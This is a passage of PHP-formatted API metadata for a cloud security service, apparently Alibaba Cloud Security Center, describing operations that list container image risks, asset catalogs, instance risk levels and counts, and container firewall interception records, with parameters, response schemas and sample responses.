'title' => ''], 'RegionId' => ['description' => 'The region where the image repository resides.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'Digest' => ['description' => 'The digest value of the image.', 'type' => 'string', 'example' => '3f8efc2184cf1d24936b49c27286a284714b77be34c80c9ee38ca6bf322445****', 'title' => ''], 'RepoId' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'example' => 'crr-bk2l746eyxca1****', 'title' => ''], 'RepoType' => ['description' => 'The repository type. Valid values:'."\n" ."\n" .'- `PUBLIC`: public'."\n" ."\n" .'- `PRIVATE`: private.', 'type' => 'string', 'example' => 'PRIVATE', 'title' => ''], 'RegistryType' => ['description' => 'The type of the image registry. Valid values:'."\n" ."\n" .'- **acr**: ACR'."\n" .'- **harbor**: Harbor'."\n" .'- **quay**: Quay'."\n" .'- **CI/CD**: Jenkins.', 'type' => 'string', 'example' => 'harbor', 'title' => ''], 'Endpoints' => ['description' => 'The list of endpoints for the image service.', 'type' => 'string', 'example' => 'https://172.20.XXX.XXX/test', 'title' => ''], 'ImageId' => ['description' => 'The image ID.', 'type' => 'string', 'example' => 'f922bfeb6960436fe3f0e7b62fc6b9a0b47980986669c367c22433269404****', 'title' => ''], 'TagImmutable' => ['description' => 'The tag immutability setting. If immutability is enabled, image versions other than latest cannot be used to overwrite existing versions in this repository. Valid values:'."\n" .'- **0**: Mutable.'."\n" .'- **1**: Immutable.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Statistics' => ['description' => 'The statistics of security events.', 'type' => 'string', 'example' => '{'."\n" .' "baselineNum": 0,'."\n" .' "newSuspicious": 0,'."\n" .' "vul": 0'."\n" .'}', 'title' => ''], 'ImageAccessType' => ['description' => 'The registration status of the image repository. Valid values:'."\n" ."\n" .'- **IN_SAS**: The repository is registered in Security Center.'."\n" .'- **NOT\\_IN\\_SAS**: The repository is not registered in Security Center.', 'type' => 'string', 'example' => 'IN_SAS', 'title' => ''], 'Image' => ['description' => 'The image.', 'type' => 'string', 'example' => '.aliyuncs.com/sas_test/baseline:exploit', 'title' => ''], 'Uuid' => ['description' => 'The unique identifier of the image.', 'type' => 'string', 'example' => '624778f3-5bf2-423c-ac0c-47a62c05****', 'title' => ''], 'EndPointList' => [ 'description' => 'The list of endpoint information.', 'type' => 'array', 'items' => [ 'description' => 'The endpoint information.', 'type' => 'object', 'properties' => [ 'Domains' => [ 'description' => 'The list of endpoint domain names.', 'type' => 'array', 'items' => ['description' => 'The endpoint domain name.', 'type' => 'string', 'example' => '****-registry-registry-intranet.cn-shenzhen.cr.aliyuncs.com', 'title' => ''], 'title' => '', 'example' => '', ], 'Type' => ['description' => 'The type of the endpoint domain name. Valid values:'."\n" .'- **internet**: public network'."\n" .'- **intranet**: private network.', 'type' => 'string', 'example' => 'internet', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'InternetURLs' => ['description' => 'The public network access URL of the image repository.', 'type' => 'string', 'example' => '****registry-registry.cn-shenzhen-finance-1.cr.aliyuncs.com/xxxx/docker-****', 'title' => ''], 'VpcURLs' => ['description' => 'The VPC access URL of the image repository.', 'type' => 'string', 'example' => '****-registry-registry-vpc.cn-shenzhen-finance-1.cr.aliyuncs.com/xxxx/docker-****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve security information of container images', 'summary' => 'Retrieves the security information of container images.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListImageRisk'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListImageRisk', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"050ACC7A-D4FD-55C6-B861-BA9569C1****\\",\\n \\"ImageRiskList\\": [\\n {\\n \\"RepoNamespace\\": \\"vultar***\\",\\n \\"RepoName\\": \\"scan_test\\",\\n \\"Tag\\": \\"0.1.0\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"Digest\\": \\"3f8efc2184cf1d24936b49c27286a284714b77be34c80c9ee38ca6bf322445****\\",\\n \\"RepoId\\": \\"crr-bk2l746eyxca1****\\",\\n \\"RepoType\\": \\"PRIVATE\\",\\n \\"RegistryType\\": \\"harbor\\",\\n \\"Endpoints\\": \\"https://172.20.XXX.XXX/test\\",\\n \\"ImageId\\": \\"f922bfeb6960436fe3f0e7b62fc6b9a0b47980986669c367c22433269404****\\",\\n \\"TagImmutable\\": 0,\\n \\"Statistics\\": \\"{\\\\n\\\\t\\\\\\"baselineNum\\\\\\": 0,\\\\n\\\\t\\\\\\"newSuspicious\\\\\\": 0,\\\\n\\\\t\\\\\\"vul\\\\\\": 0\\\\n}\\",\\n \\"ImageAccessType\\": \\"IN_SAS\\",\\n \\"Image\\": \\".aliyuncs.com/sas_test/baseline:exploit\\",\\n \\"Uuid\\": \\"624778f3-5bf2-423c-ac0c-47a62c05****\\",\\n \\"EndPointList\\": [\\n {\\n \\"Domains\\": [\\n \\"****-registry-registry-intranet.cn-shenzhen.cr.aliyuncs.com\\"\\n ],\\n \\"Type\\": \\"internet\\"\\n }\\n ],\\n \\"InternetURLs\\": \\"****registry-registry.cn-shenzhen-finance-1.cr.aliyuncs.com/xxxx/docker-****\\",\\n \\"VpcURLs\\": \\"****-registry-registry-vpc.cn-shenzhen-finance-1.cr.aliyuncs.com/xxxx/docker-****\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 23,\\n \\"Count\\": 3,\\n \\"PageSize\\": 20,\\n \\"CurrentPage\\": 1\\n }\\n}","type":"json"}]', ], 'ListInstanceCatalog' => [ 'summary' => 'Queries the asset types and asset subtypes for configuration assessment.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => [ 'description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'enumValueTitles' => ['en' => 'en', 'zh' => 'zh'], 'example' => 'zh', 'title' => '', ], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The ID of the region in which the asset resides. Valid values:'."\n" ."\n" .'* **cn-hangzhou**: International'."\n" .'* **ap-southeast-1**: Singapore'."\n", 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Types', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of check standards.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the check standard. Valid values:'."\n" ."\n" .'* **RISK**: Alibaba Cloud best security practices'."\n" .'* **COMPLIANCE**: Center for Internet Security (CIS) compliance'."\n" .'* **IDENTITY_PERMISSION**: identity and permission management'."\n", 'type' => 'string', 'required' => false, 'example' => 'RISK', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'StandardIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of standards.'."\n", 'type' => 'array', 'items' => ['description' => 'The IDs of standards.'."\n" ."\n" .'> You can call the [ListCheckStandard](~~ListCheckStandard~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'RequirementIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of requirement items.'."\n", 'type' => 'array', 'items' => ['description' => 'The IDs of requirement items.'."\n" ."\n" .'> You can call the [ListCheckStandard](~~ListCheckStandard~~) operation to query the ID.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '27', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'OnlyCustom', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to filter the assets that support custom checks. Valid values:'."\n" ."\n" .'* **true**: Filter assets that support custom checks.'."\n" .'* **false**: All assets are selected. This is the default value.'."\n", 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'TaskSources', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'type' => 'array', 'items' => ['type' => 'string', 'required' => false, 'description' => 'Task source. Values: - YAO_CHI: Yaochi Console.', 'example' => 'YAO_CHI', 'title' => ''], 'required' => false, 'maxItems' => 100, 'description' => 'List of task sources.', 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'GetCheckConfigResponse', 'description' => 'GetCheckConfigResponse'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '0D42A83F-CE33-5F54-A5AE-05DA39F59E1B', 'title' => ''], 'Vendors' => [ 'description' => 'The asset types by service provider.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The asset type by service provider.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the service provider.'."\n", 'type' => 'string', 'example' => 'ALIYUN', 'title' => ''], 'InstanceTypes' => [ 'description' => 'The asset types.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The asset type.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the asset type.'."\n", 'type' => 'string', 'example' => 'ECS', 'title' => ''], 'InstanceSubTypes' => [ 'description' => 'The asset subtypes.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The asset subtype.'."\n", 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the asset subtype.'."\n", 'type' => 'string', 'example' => 'SECURITY_GROUP', 'title' => ''], 'Value' => ['description' => 'The ID of the asset subtype.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Value' => ['description' => 'The ID of the asset type. Valid values:'."\n" ."\n" .'* **0**: Elastic Compute Service (ECS)'."\n" .'* **1**: Server Load Balancer (SLB)'."\n" .'* **3**: ApsaraDB RDS'."\n" .'* **4**: ApsaraDB for MongoDB (MongoDB)'."\n" .'* **5**: Tair (Redis OSS-compatible)'."\n" .'* **6**: Container Registry'."\n" .'* **8**: Container Service for Kubernetes (ACK)'."\n" .'* **9**: Virtual Private Cloud (VPC)'."\n" .'* **11**: ActionTrail'."\n" .'* **12**: Alibaba Cloud CDN (CDN)'."\n" .'* **13**: Certificate Management Service (formerly SSL Certificates Service)'."\n" .'* **14**: Alibaba Cloud DevOps'."\n" .'* **15**: Resource Access Management (RAM)'."\n" .'* **16**: Anti-DDoS'."\n" .'* **17**: Web Application Firewall (WAF)'."\n" .'* **18**: Object Storage Service (OSS)'."\n" .'* **19**: PolarDB'."\n" .'* **20**: ApsaraDB RDS for PostgreSQL'."\n" .'* **21**: Microservices Engine (MSE)'."\n" .'* **22**: Apsara File Storage NAS (NAS)'."\n" .'* **23**: Data Security Center (DSC)'."\n" .'* **24**: Elastic IP Address (EIP)'."\n" .'* **25**: Identity as a Service (IDaaS) - Enterprise Identity Access Management (EIAM)'."\n" .'* **26**: PolarDB for Xscale (PolarDB-X)'."\n" .'* **27**: Elasticsearch'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '15', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Value' => ['description' => 'The ID of the service provider type. Valid values:'."\n" ."\n" .'* **0**: an asset provided by Alibaba Cloud'."\n" .'* **1**: an asset outside Alibaba Cloud'."\n" .'* **2**: an asset in a data center'."\n" .'* **3**, **4**, **5**, and **7**: an asset from a third-party cloud service provider'."\n" .'* **8**: a lightweight cloud asset'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"0D42A83F-CE33-5F54-A5AE-05DA39F59E1B\\",\\n \\"Vendors\\": [\\n {\\n \\"Name\\": \\"ALIYUN\\",\\n \\"InstanceTypes\\": [\\n {\\n \\"Name\\": \\"ECS\\",\\n \\"InstanceSubTypes\\": [\\n {\\n \\"Name\\": \\"SECURITY_GROUP\\",\\n \\"Value\\": 1\\n }\\n ],\\n \\"Value\\": 15\\n }\\n ],\\n \\"Value\\": 0\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListInstanceCatalog', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInstanceCatalog'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListInstanceCatalog', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListInstanceRiskLevels' => [ 'summary' => 'Queries the risk levels of instances.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'InstanceList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The instances.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['title' => '', 'description' => 'The serial number of the instance.'."\n", 'type' => 'string', 'required' => false, 'example' => 'f2d6e901-1004-4ca8-9dae-53ec04a9****'], 'InstanceId' => ['title' => '', 'description' => 'The ID of the instance.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-m5efigezp50l2cmb****'], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'ListResult', 'description' => 'ListResult'."\n", 'type' => 'object', 'properties' => [ 'InstanceRiskLevels' => [ 'description' => 'The risk levels of instances.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The ID of the server.'."\n", 'type' => 'string', 'example' => 'i-m5efigezp50l2cmb****', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server for which you want to modify the defense rule. You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'example' => 'f2d6e901-1004-4ca8-9dae-53ec04a92765', 'title' => ''], 'Level' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'* **high**'."\n" .'* **medium**'."\n" .'* **low**'."\n" .'* **none**'."\n", 'type' => 'string', 'example' => 'high', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'ListInstanceRiskLevels', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInstanceRiskLevels'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListInstanceRiskLevels', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InstanceRiskLevels\\": [\\n {\\n \\"InstanceId\\": \\"i-m5efigezp50l2cmb****\\",\\n \\"Uuid\\": \\"f2d6e901-1004-4ca8-9dae-53ec04a92765\\",\\n \\"Level\\": \\"high\\"\\n }\\n ],\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\"\\n}","type":"json"}]', ], 'ListInstanceRiskNum' => [ 'summary' => 'Queries the statistics about risks in instances.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'InstanceList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The instances.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['title' => '', 'description' => 'The UUID of the instance.'."\n", 'type' => 'string', 'required' => false, 'example' => 'f2d6e901-1004-4ca8-9dae-53ec04a9****'], 'InstanceId' => ['title' => '', 'description' => 'The ID of the instance.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-wz9fdluqx20mp2x7****'], ], 'required' => false, 'description' => '', 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'ListResult', 'description' => 'ListResult'."\n", 'type' => 'object', 'properties' => [ 'InstanceRiskNum' => [ 'description' => 'The information about the risks in the instance.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'InstanceItem' => [ 'title' => '', 'description' => 'The information about the instance.'."\n", 'type' => 'object', 'properties' => [ 'Uuid' => ['title' => '', 'description' => 'The UUID of the instance.'."\n", 'type' => 'string', 'example' => 'f2d6e901-1004-4ca8-9dae-53ec04a9****'], 'InstanceId' => ['title' => '', 'description' => 'The ID of the instance.'."\n", 'type' => 'string', 'example' => 'i-wz9fdluqx20mp2x7****'], ], 'example' => '', ], 'RiskNumEntity' => [ 'title' => '', 'description' => 'The statistics about the risks.'."\n", 'type' => 'object', 'properties' => [ 'VulHighCount' => ['title' => '', 'description' => 'The number of high-risk vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1'], 'VulMediumCount' => ['title' => '', 'description' => 'The number of medium-risk vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '2'], 'VulLowCount' => ['title' => '', 'description' => 'The number of low-risk vulnerabilities.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3'], 'WeakPassWordCount' => ['title' => '', 'description' => 'The number of weak passwords exposed on the Internet.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '4'], 'SuspiciousHighCount' => ['title' => '', 'description' => 'The number of high-risk alerts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '5'], 'SuspiciousMediumCount' => ['title' => '', 'description' => 'The number of medium-risk alerts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '6'], 'SuspiciousLowCount' => ['title' => '', 'description' => 'The number of low-risk alerts.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7'], ], 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '291B49F9-1685-4005-9D34-606B6F78****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'ListInstanceRiskNum', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListInstanceRiskNum'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListInstanceRiskNum', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"InstanceRiskNum\\": [\\n {\\n \\"InstanceItem\\": {\\n \\"Uuid\\": \\"f2d6e901-1004-4ca8-9dae-53ec04a9****\\",\\n \\"InstanceId\\": \\"i-wz9fdluqx20mp2x7****\\"\\n },\\n \\"RiskNumEntity\\": {\\n \\"VulHighCount\\": 1,\\n \\"VulMediumCount\\": 2,\\n \\"VulLowCount\\": 3,\\n \\"WeakPassWordCount\\": 4,\\n \\"SuspiciousHighCount\\": 5,\\n \\"SuspiciousMediumCount\\": 6,\\n \\"SuspiciousLowCount\\": 7\\n }\\n }\\n ],\\n \\"RequestId\\": \\"291B49F9-1685-4005-9D34-606B6F78****\\"\\n}","type":"json"}]', ], 'ListInterceptionHistory' => [ 'summary' => 'Queries container firewall interception records.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'HistoryName', 'in' => 'query', 'schema' => ['description' => 'The alert name.', 'type' => 'string', 'required' => false, 'example' => '异常访问。', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start timestamp of the query.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1651290987000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end timestamp of the query.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1635575219000', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'InterceptionTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of exception events.', 'type' => 'array', 'items' => ['description' => 'The type of the exception event. Valid values:'."\n" ."\n" .'- **1**: blocked'."\n" .'- **2**: alert.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.', 'type' => 'string', 'required' => false, 'example' => 'c7c190a82d9a048be9038d352840f****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'D81DD78E-E006-5C65-A171-C8CB0904****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page for a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of records returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '45', 'title' => ''], 'Count' => ['description' => 'The number of records on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'InterceptionHistoryList' => [ 'description' => 'The container firewall interception records.', 'type' => 'array', 'items' => [ 'description' => 'The container firewall interception records.', 'type' => 'object', 'properties' => [ 'SrcNamespace' => ['description' => 'The namespace of the source instance.', 'type' => 'string', 'example' => 'service****', 'title' => ''], 'SrcRuleTargetName' => ['description' => 'The source target object name of the rule.', 'type' => 'string', 'example' => 'sas-web****', 'title' => ''], 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **-1**: unknown'."\n" .'- **0**: none'."\n" .'- **1**: low'."\n" .'- **2**: medium'."\n" .'- **3**: high.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Status' => ['description' => 'The processing status. Valid values:'."\n" ."\n" .'- **0**: unprocessed'."\n" .'- **1**: processed'."\n" .'- **2**: manually processed'."\n" .'- **3**: ignored.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'DstPort' => ['description' => 'The destination port number configured in the rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '33', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp of the first occurrence on the current day.', 'type' => 'integer', 'format' => 'int64', 'example' => '1639718858000', 'title' => ''], 'SrcAppName' => ['description' => 'The source application name configured in the rule.', 'type' => 'string', 'example' => 'sas-web****', 'title' => ''], 'RuleId' => ['description' => 'The ID of the corresponding rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '136', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'all****', 'title' => ''], 'InterceptionName' => ['description' => 'The alert name.', 'type' => 'integer', 'format' => 'int64', 'example' => '异常访问。', 'title' => ''], 'DstNamespace' => ['description' => 'The destination namespace configured in the rule.', 'type' => 'string', 'example' => 'service****', 'title' => ''], 'LastTime' => ['description' => 'The timestamp of the latest occurrence on the current day.', 'type' => 'integer', 'format' => 'int64', 'example' => '1639731078000', 'title' => ''], 'DstAppName' => ['description' => 'The destination application name configured in the rule.', 'type' => 'string', 'example' => 'sas-web****', 'title' => ''], 'DstRuleTargetName' => ['description' => 'The destination target object name of the rule.', 'type' => 'string', 'example' => 'sas-web****', 'title' => ''], 'ClusterName' => ['description' => 'The cluster name.', 'type' => 'string', 'example' => 'opa-terway-nonet****', 'title' => ''], 'TryCount' => ['description' => 'The number of attempts.', 'type' => 'integer', 'format' => 'int32', 'example' => '34', 'title' => ''], 'InterceptionType' => ['description' => 'The processing type. Valid values:'."\n" ."\n" .'- **0**: observe'."\n" .'- **1**: block'."\n" .'- **2**: alert'."\n" .'- **3**: allow.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RealInterceptionType' => ['description' => 'The actual processing type that was matched. Valid values:'."\n" ."\n" .'- **0**: observe'."\n" .'- **1**: block'."\n" .'- **2**: alert'."\n" .'- **3**: allow.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Id' => ['description' => 'The ID of the alert.', 'type' => 'integer', 'format' => 'int64', 'example' => '1126', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'example' => 'c556c8133b5ad4378b7fc533ddbda****', 'title' => ''], 'RealSrcAppName' => ['description' => 'The source application name.', 'type' => 'string', 'example' => 'sas-service****', 'title' => ''], 'RealSrcPodName' => ['description' => 'The source pod.', 'type' => 'string', 'example' => 'sas-service-757b9d****', 'title' => ''], 'RealDstAppName' => ['description' => 'The destination application name.', 'type' => 'string', 'example' => 'sas-service****', 'title' => ''], 'RealDstPodName' => ['description' => 'The destination pod.', 'type' => 'string', 'example' => 'sas-web-84cc7dd9****', 'title' => ''], 'RealDstNamespace' => ['description' => 'The destination namespace.', 'type' => 'string', 'example' => 'service****', 'title' => ''], 'RealDstImageName' => ['description' => 'The destination image name.', 'type' => 'string', 'example' => 'sas-servi****', 'title' => ''], 'RealSrcNamespace' => ['description' => 'The source 